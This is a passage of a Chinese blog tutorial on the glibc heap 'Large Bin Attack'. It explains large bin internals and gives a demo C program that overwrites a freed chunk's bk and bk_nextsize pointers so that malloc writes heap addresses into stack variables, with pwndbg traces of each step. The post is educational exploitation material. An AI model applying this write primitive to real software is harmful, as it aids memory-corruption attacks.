

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.jpg">
  <link rel="icon" href="/img/favicon.jpg">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Hailin Zheng">
  <meta name="keywords" content="">
  
    <meta name="description" content="Large Bin Attack从标题就可以看出这种攻击手法和Largebin有关，分配largebin有关的chunk，需要经过fast bin、unsort bin、small bin的分配，所以在学习large bin attack之前需要搞清楚fastbin和unsortbin分配的流程。 Large Binlarge bin中一共包括63个bin，每个bin中的chunk大小不一致，而是">
<meta property="og:type" content="article">
<meta property="og:title" content="Linux Heap PWN：Large Bin Attack">
<meta property="og:url" content="https://zheng-hailin.github.io/2026/04/06/largebin-attack/index.html">
<meta property="og:site_name" content="Hailin Zheng&#39;s Blog">
<meta property="og:description" content="Large Bin Attack从标题就可以看出这种攻击手法和Largebin有关，分配largebin有关的chunk，需要经过fast bin、unsort bin、small bin的分配，所以在学习large bin attack之前需要搞清楚fastbin和unsortbin分配的流程。 Large Binlarge bin中一共包括63个bin，每个bin中的chunk大小不一致，而是">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/figure/large_bin_attack/large_bin_attack3.png">
<meta property="og:image" content="https://zheng-hailin.github.io/images/largebin-attack/1.png">
<meta property="article:published_time" content="2026-04-06T06:01:15.000Z">
<meta property="article:modified_time" content="2026-05-29T16:24:45.386Z">
<meta property="article:author" content="Hailin Zheng">
<meta property="article:tag" content="Pwn">
<meta property="article:tag" content="Heap">
<meta property="article:tag" content="Large Bin Attack">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/figure/large_bin_attack/large_bin_attack3.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>Linux Heap PWN：Large Bin Attack - Hailin Zheng&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="https://cdn.staticfile.org/lxgw-wenkai-screen-webfont/1.7.0/style.min.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"zheng-hailin.github.io","root":"/","version":"1.9.9","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"expand_all":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":"https://hm.baidu.com/hm.js?b9b0b3e62acf7317ea950312e92ab427","google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"openkounter":{"server_url":"https://open-kounter.mintimate.cn","path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  
    <!-- Baidu Analytics -->
    <script async>
      if (!Fluid.ctx.dnt) {
        var _hmt = _hmt || [];
        (function() {
          var hm = document.createElement("script");
          hm.src = "https://hm.baidu.com/hm.js?https://hm.baidu.com/hm.js?b9b0b3e62acf7317ea950312e92ab427";
          var s = document.getElementsByTagName("script")[0];
          s.parentNode.insertBefore(hm, s);
        })();
      }
    </script>
  

  

  

  

  

  
    
  




  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>zer0ptr&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content (desktop) -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
          
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/suisuinian/" target="_self">
                <i class="iconfont icon-books"></i>
                <span>碎碎念</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="https://github.com/zer0ptr" target="_self">
                <i class="iconfont icon-github-fill"></i>
                <span>Github</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

<!-- Mobile grid menu overlay -->
<div id="mobile-grid-menu" class="d-lg-none">
  <div class="mobile-grid-menu-inner">
    <div class="container">
      <div class="row">
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-home-fill"></i>
                  <span>首页</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/archives/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-archive-fill"></i>
                  <span>归档</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/categories/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-category-fill"></i>
                  <span>分类</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/tags/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-tags-fill"></i>
                  <span>标签</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/about/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-user-fill"></i>
                  <span>关于</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/links/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-link-fill"></i>
                  <span>友链</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/suisuinian/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-books"></i>
                  <span>碎碎念</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="https://github.com/zer0ptr" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-github-fill"></i>
                  <span>Github</span>
                </div>
              </a>
            </div>
          
        
        
          <div class="col-4 mobile-grid-cell" id="mobile-search-btn">
            <a href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <div class="mobile-grid-item">
                <i class="iconfont icon-search"></i>
                <span>搜索</span>
              </div>
            </a>
          </div>
        
        
          <div class="col-4 mobile-grid-cell" id="mobile-color-toggle-btn"
               data-label-light="开灯"
               data-label-dark="关灯">
            <a href="javascript:;" aria-label="Color Toggle">
              <div class="mobile-grid-item">
                <i class="iconfont icon-dark" id="mobile-color-toggle-icon"></i>
                <span id="mobile-color-toggle-label">关灯</span>
              </div>
            </a>
          </div>
        
      </div>
    </div>
  </div>
</div>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/background.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="Linux Heap PWN：Large Bin Attack"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2026-04-06 14:01" pubdate>
          2026年4月6日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          10k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          87 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>



</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">Linux Heap PWN：Large Bin Attack</h1>
            
            
              <div class="markdown-body">
                
                <h2 id="Large-Bin-Attack"><a href="#Large-Bin-Attack" class="headerlink" title="Large Bin Attack"></a>Large Bin Attack</h2><p>从标题就可以看出这种攻击手法和Largebin有关，分配largebin有关的chunk，需要经过fast bin、unsort bin、small bin的分配，所以在学习large bin attack之前需要搞清楚fastbin和unsortbin分配的流程。</p>
<h3 id="Large-Bin"><a href="#Large-Bin" class="headerlink" title="Large Bin"></a>Large Bin</h3><p>large bin中一共包括63个bin，每个bin中的chunk大小不一致，而是出于一定区间范围内。此外这63个bin被分成了6组，每组bin中的chunk之间的公差一致。</p>
<h3 id="Large-chunk的微观结构"><a href="#Large-chunk的微观结构" class="headerlink" title="Large chunk的微观结构"></a>Large chunk的微观结构</h3><p>大于512（1024）字节的chunk称之为large chunk，large bin就是用于管理这些large chunk的</p>
<p>被释放进Large Bin中的chunk，除了以前经常见到的prev_size、size、fd、bk之外，还具有 <code>fd_nextsize</code> 和 <code>bk_nextsize</code>：</p>
<ol>
<li>fd_nextsize，bk_nextsize：只有chunk可先的时候才使用，不过用于较大的chunk（large chunk）；</li>
<li>fd_nextsize指向前一个与当前chunk大小不同的第一个空闲块，不包含bin的头指针；</li>
<li>bk_nextsize指向后一个与当前chunk大小不同的第一个空闲块，不包含bin的头指针；</li>
<li><strong>一般空闲的large chunk在fd的遍历顺序中，按照由大到小的顺序排列</strong>。这样可以避免在寻找合适chunk时挨个遍历。</li>
</ol>
<h3 id="Large-Bin的插入顺序"><a href="#Large-Bin的插入顺序" class="headerlink" title="Large Bin的插入顺序"></a>Large Bin的插入顺序</h3><p>在index相同情况下：</p>
<ol>
<li>按照大小，从大到小排序（小的链接large bin块）</li>
<li>如果大小相同，按照free的时间顺序</li>
<li>多个大小相同的堆块，只有首堆块的fd_nextsize和bk_nextsize会指向其他的堆块，后面的堆块的fd_nextsize和bk_nextsize均为0</li>
<li>size最大的chunk的bk_nextsize指向最小的chunk，size最小的chunk的fd_nextsize指向最大的chunk</li>
</ol>
<h3 id="Large-Bin-Attack-1"><a href="#Large-Bin-Attack-1" class="headerlink" title="Large Bin Attack"></a>Large Bin Attack</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-comment">// gcc -g -no-pie example.c -o example</span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdlib.h&gt;</span></span><br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span><br>&#123;<br><br>    <span class="hljs-type">unsigned</span> <span class="hljs-type">long</span> stack_var1 = <span class="hljs-number">0</span>;<br>    <span class="hljs-type">unsigned</span> <span class="hljs-type">long</span> stack_var2 = <span class="hljs-number">0</span>;<br><br>    <span class="hljs-built_in">fprintf</span>(<span class="hljs-built_in">stderr</span>, <span class="hljs-string">&quot;stack_var1 (%p): %ld\n&quot;</span>, &amp;stack_var1, stack_var1);<br>    <span class="hljs-built_in">fprintf</span>(<span class="hljs-built_in">stderr</span>, <span class="hljs-string">&quot;stack_var2 (%p): %ld\n\n&quot;</span>, &amp;stack_var2, stack_var2);<br><br>    <span class="hljs-type">unsigned</span> <span class="hljs-type">long</span> *p1 = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x320</span>);<br>    <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x20</span>);<br>    <span class="hljs-type">unsigned</span> <span class="hljs-type">long</span> *p2 = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x400</span>);<br>    <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x20</span>);<br>    <span class="hljs-type">unsigned</span> <span class="hljs-type">long</span> *p3 = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x400</span>);<br>    <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x20</span>);<br><br>    <span class="hljs-built_in">free</span>(p1);<br>    <span class="hljs-built_in">free</span>(p2);<br><br>    <span class="hljs-type">void</span>* p4 = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x90</span>);<br><br>    <span class="hljs-built_in">free</span>(p3);<br><br>    p2[<span class="hljs-number">-1</span>] = <span class="hljs-number">0x3f1</span>;<br>    p2[<span class="hljs-number">0</span>] = <span class="hljs-number">0</span>;<br>    p2[<span class="hljs-number">2</span>] = <span class="hljs-number">0</span>;<br>    p2[<span class="hljs-number">1</span>] = (<span class="hljs-type">unsigned</span> <span class="hljs-type">long</span>)(&amp;stack_var1 - <span class="hljs-number">2</span>);<br>    p2[<span class="hljs-number">3</span>] = (<span class="hljs-type">unsigned</span> <span class="hljs-type">long</span>)(&amp;stack_var2 - <span class="hljs-number">4</span>);<br><br>    <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x90</span>);<br><br>    <span class="hljs-built_in">fprintf</span>(<span class="hljs-built_in">stderr</span>, <span class="hljs-string">&quot;stack_var1 (%p): %p\n&quot;</span>, &amp;stack_var1, (<span class="hljs-type">void</span> *)stack_var1);<br>    <span class="hljs-built_in">fprintf</span>(<span class="hljs-built_in">stderr</span>, <span class="hljs-string">&quot;stack_var2 (%p): %p\n&quot;</span>, &amp;stack_var2, (<span class="hljs-type">void</span> *)stack_var2);<br><br>    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>程序执行流程：</p>
<ol>
<li>首先定义了两个变量stack_var1和stack_var2，并且都赋值为0。</li>
<li>接下来打印出两个变量的地址stack_var1_addr和stack_var2_addr以及两个变量中的值。</li>
<li>分别申请size为0x330、0x410、0x410三个大堆块p1、p2、p3，以及三个size为0x20的小堆块。</li>
<li>然后释放掉p1和p2，并申请了一个size为0xa0的堆块，继续释放p3.接着直接修改p2的size、fd、bk、fd_nextsize、bk_nextsize。</li>
<li>申请了一个size为0xa0大小的堆块。再次打印stack_var1、stack_var2的地址和值</li>
</ol>
<blockquote>
<p>注：我们创建的堆块分别为三个大堆块和三个小堆块，分别为 <code>P1</code>，<code>防止合并</code>， <code>P2</code>， <code>防止合并</code>， <code>P3</code>， <code>防止合并</code></p>
</blockquote>
<h3 id="查看stack-var1和stack-var2的地址及值"><a href="#查看stack-var1和stack-var2的地址及值" class="headerlink" title="查看stack_var1和stack_var2的地址及值"></a>查看stack_var1和stack_var2的地址及值</h3><p>现在我们开始调试，在14行下断点，我们看一下打印出来的stack_var1和stack_var2的地址：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_">pwndbg&gt; </span><span class="language-bash">c</span><br>Continuing.<br>stack_var1 (0x7fff88da8bb8): 0<br>stack_var2 (0x7fff88da8bc0): 0<br></code></pre></td></tr></table></figure>
<p>可以看到stack_var1_addr为 <code>0x7fff88da8bb8</code>，stack_var2_addr为 <code>0x7fff88da8bc0</code>，两个变量中的值均为0。</p>
<h3 id="查看已创建的chunk"><a href="#查看已创建的chunk" class="headerlink" title="查看已创建的chunk"></a>查看已创建的chunk</h3><p>接下来在第21行下断点，使程序完成对三个大堆块以及三个小堆块的创建：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_">pwndbg&gt; </span><span class="language-bash">parseheap</span><br>addr                prev                size                 status              fd                bk<br>0x13793000          0x0                 0x330                Used                None              None<br>0x13793330          0x0                 0x30                 Used                None              None<br>0x13793360          0x0                 0x410                Used                None              None<br>0x13793770          0x0                 0x30                 Used                None              None<br>0x137937a0          0x0                 0x410                Used                None              None<br>0x13793bb0          0x0                 0x30                 Used                None              None<br></code></pre></td></tr></table></figure>
<p>可以看到六个chunk已经创建完毕了，其中三个size为0x30的chunk是为了放置P1、P2、P3在释放的时候被top_chunk合并，并不是主要的执行流程。</p>
<h3 id="释放P1和P2"><a href="#释放P1和P2" class="headerlink" title="释放P1和P2"></a>释放P1和P2</h3><p>接着断点下在24行，使程序释放p1和p2，这里需要注意的是释放顺序，先释放的是p1，后释放的是p2：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_">pwndbg&gt; </span><span class="language-bash">bins</span><br>fastbins<br>empty<br>unsortedbin<br>all: 0x13793360 —▸ 0x13793000 —▸ 0x7ef106ffab78 (main_arena+88) ◂— 0x13793360<br>smallbins<br>empty<br>largebins<br>empty<br></code></pre></td></tr></table></figure>
<p>由于刚 free() 掉了两个 chunk。现在的 unsorted bin 有两个空闲的 chunk<br><img src="https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/figure/large_bin_attack/large_bin_attack3.png" srcset="/img/loading.gif" lazyload></p>
<p>由于P1的size为0x330，P2的size为0x410，两个chunk的size均超过了fast chunk的最大值，所以在释放P1、P2的时候，两个chunk均进入unsortbin链表中。</p>
<blockquote>
<p>这里还可以细分，由于P1的size小于0x3F0，所以P1最终应该归属为small bin中。P2大于0x3F0，所以P2最终应该归属为large bin中。</p>
</blockquote>
<h3 id="分割P1满足P4的请求"><a href="#分割P1满足P4的请求" class="headerlink" title="分割P1满足P4的请求"></a>分割P1满足P4的请求</h3><p>接下来我们将断点在第26行，使程序执行 <code>void* p4 = malloc(0x90);</code> 这段代码。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_">pwndbg&gt; </span><span class="language-bash">bin</span><br>fastbins<br>empty<br>unsortedbin<br>all: 0x137930a0 —▸ 0x7ef106ffab78 (main_arena+88) ◂— 0x137930a0<br>smallbins<br>empty<br>largebins<br>0x400-0x430: 0x13793360 —▸ 0x7ef106ffaf68 (main_arena+1096) ◂— 0x13793360<br></code></pre></td></tr></table></figure>

<p><code>void* p4 = malloc(0x90);</code> 这段代码其实背后做了很多的事情：</p>
<ul>
<li>从 unsorted bin 中拿出最后一个 chunk（p1 属于 small bin 的范围）</li>
<li>把这个 chunk 放入 small bin 中，并标记这个 small bin 有空闲的 chunk</li>
<li>再从 unsorted bin 中拿出最后一个 chunk（p2 属于 large bin 的范围）</li>
<li>把这个 chunk 放入 large bin 中，并标记这个 large bin 有空闲的 chunk</li>
<li>现在 unsorted bin 为空，从 small bin （p1）中分配一个小的 chunk 满足请求 0x90，并把剩下的 chunk（0x330 - 0xa0）放入 unsorted bin 中</li>
</ul>
<p>也就是说，现在：</p>
<ol>
<li>unsorted bin 中有一个 chunk 大小是 <code>0x330 - 0xa0 = 0x290</code></li>
<li>large bin 某一个序列的 bin 中有一个 chunk 大小是 0x410</li>
</ol>
<h3 id="释放P3"><a href="#释放P3" class="headerlink" title="释放P3"></a>释放P3</h3><p>接下来我们将断点端在第28行，使程序释放P3：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_">pwndbg&gt; </span><span class="language-bash">parseheap</span><br>addr                prev                size                 status              fd                bk<br>0x13793000          0x0                 0xa0                 Used                None              None<br>0x137930a0          0x0                 0x290                Freed     0x7ef106ffab78        0x137937a0<br>0x13793330          0x290               0x30                 Used                None              None<br>0x13793360          0x0                 0x410                Freed     0x7ef106ffaf68    0x7ef106ffaf68<br>0x13793770          0x410               0x30                 Used                None              None<br>0x137937a0          0x0                 0x410                Freed         0x137930a0    0x7ef106ffab78<br>0x13793bb0          0x410               0x30                 Used                None              None<br><span class="hljs-meta prompt_">pwndbg&gt; </span><span class="language-bash">bin</span><br>fastbins<br>empty<br>unsortedbin<br>all: 0x137937a0 [P3] —▸ 0x137930a0 [P1_left] —▸ 0x7ef106ffab78 (main_arena+88) ◂— 0x137937a0<br>smallbins<br>empty<br>largebins <br>0x400-0x430: 0x13793360 [P2] —▸ 0x7ef106ffaf68 (main_arena+1096) ◂— 0x13793360<br></code></pre></td></tr></table></figure>

<p>由于P3的size也是大于0x3F0的，所以首先会被挂进unsorted bin中进行过渡</p>
<h3 id="修改P2结构内容"><a href="#修改P2结构内容" class="headerlink" title="修改P2结构内容"></a>修改P2结构内容</h3><p>接下来我们将断点下在第34行，使程序完成对P2内部结构数据的修改，这里附上修改前后的对比：</p>
<p>修改前：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_">pwndbg&gt; </span><span class="language-bash">x/6gx 0x13793360</span><br>0x13793360:     0x0000000000000000 [prev_size]      0x0000000000000411 [size]<br>0x13793370:     0x00007ef106ffaf68 [fd]      0x00007ef106ffaf68 [bk]<br>0x13793380:     0x0000000013793360 [fd_nextsize]      0x0000000013793360 [bk_nextsize]<br></code></pre></td></tr></table></figure>

<p>修改后：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_">pwndbg&gt; </span><span class="language-bash">x/6gx 0x13793360</span><br>0x13793360:     0x0000000000000000 [prev_size]      0x00000000000003f1 [size]<br>0x13793370:     0x0000000000000000 [改为0x0]      0x00007fff88da8ba8 [改为stack_var1-0x10]<br>0x13793380:     0x0000000000000000 [改为0x0]      0x00007fff88da8ba0 [改为stack_var2-0x20]<br></code></pre></td></tr></table></figure>

<p>可以看到，有五处内容被修改：</p>
<ol>
<li>size部分由原来的0x411修改成0x3f1</li>
<li>fd部分置空（不超过一个地址位长度的数据都可以）</li>
<li>bk由0x7ffff7dd1f68修改成了stack_var1_addr - 0x10(0x00007fff88da8ba8)</li>
<li>fd_nextsize置空（不超过一个地址位长度的数据都可以）</li>
<li>bk_nextsize修改成stack_var2_addr - 0x20(0x00007fff88da8ba0)</li>
</ol>
<p><img src="/images/largebin-attack/1.png" srcset="/img/loading.gif" lazyload></p>
<p>这里需要注意的是一个chunk的bk指向的是它的后一个被释放chunk的头指针，bk_nextsize指向后一个与当前chunk大小不同的第一个空闲块的头指针：</p>
<ul>
<li>也就是说当前P2的bk指向的是一个以 <code>stack_var1_addr - 0x10</code> 为头指针的chunk，这里记做fake_chunk1，那么就意味着 <code>stack_var1_addr</code> 是作为这个fake_chunk1的fd指针。那么此时 <code>P2 --&gt; bk --&gt; fd</code> 就是 <code>stack_var1_addr</code></li>
<li>P2的fd_nextsize指向的是一个以 <code>stack_var2_addr</code> 为头指针的chunk，这里记做fake_chunk2，那么就意味着<code>stack_var2_addr</code> 是作为这个fake_chunk2的fd_nextsize指针。那么此时 <code>P2 --&gt; bk_nextsize --&gt; fd_nextsize</code> 就是 <code>stack_var2_addr</code></li>
</ul>
<h3 id="P3挂进Large-Bin的过程"><a href="#P3挂进Large-Bin的过程" class="headerlink" title="P3挂进Large Bin的过程"></a>P3挂进Large Bin的过程</h3><p>接下来我们在第36行下断点，使程序执行 <code>malloc(0x90);</code> 完成申请size为0xa0的chunk。这一步也很关键，与第一次分割chunk的过程一致，首先从unsorted bin中拿出最后一个chunk(P1_left size &#x3D; 0x290)，并放入small bin中标记该序列的small bin有空闲chunk。再从unsorted bin中拿出最后一个chunk(P3 size &#x3D; 0x410)，P3的size是大于0x3f0的，所以理所应当应该向large bin中挂</p>
